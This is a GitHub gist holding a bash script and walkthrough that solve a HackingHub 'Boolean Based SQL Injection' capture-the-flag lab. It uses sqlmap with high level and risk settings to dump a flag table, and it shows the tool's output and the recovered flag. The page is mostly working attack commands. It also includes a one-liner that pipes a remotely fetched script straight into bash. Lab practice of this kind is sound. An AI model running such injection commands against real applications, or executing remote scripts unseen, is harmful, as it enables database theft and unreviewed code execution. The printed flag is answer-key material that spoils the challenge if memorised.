Skip to content

Instantly share code, notes, and snippets.

@richardevcom

richardevcom/getFlag.sh

Last active September 3, 2024 00:40
Show Gist options
  • Save richardevcom/8ecfe76937db4d761bdb203d28c25ebc to your computer and use it in GitHub Desktop.
Save richardevcom/8ecfe76937db4d761bdb203d28c25ebc to your computer and use it in GitHub Desktop.
Download ZIP
HackingHub - Capture flag in "Boolean Based SQL Injection" challange using SQLMap
Raw
getFlag.sh
# Challange: https://app.hackinghub.io/hubs/interactive-sqli-boolean
#!/bin/bash
apt update
apt install -y sqlmap
# Provide injectable URL for this script
# URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"
URL=$1
sqlmap -u $URL \
--dbms=mysql --technique=B --level=5 --risk=3 --not-string="\"taken\":false" \
--dump -D sqli_three -T flag -C flag --batch
@richardevcom
Copy link
Author

richardevcom commented Sep 3, 2024
edited
Loading

Challange: Boolean Based SQL Injection

  1. Launch hub;
  2. Open hub URL (mine was https://dc9zxy0y.eu2.ctfio.com);
  3. Append /api/checkuser?username=adam to the url;
  4. Run the command below (change URL to your injection url of the hub):
    URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"
    will return:
[...]
[03:35:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.22.0
back-end DBMS: MySQL >= 8.0.0
[03:35:04] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] resumed: 1
[03:35:04] [INFO] resumed: FLAG{s63gvi}
Database: sqli_three
Table: flag
[1 entry]
+--------------+
| flag         |
+--------------+
| FLAG{s63gvi} |
+--------------+

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment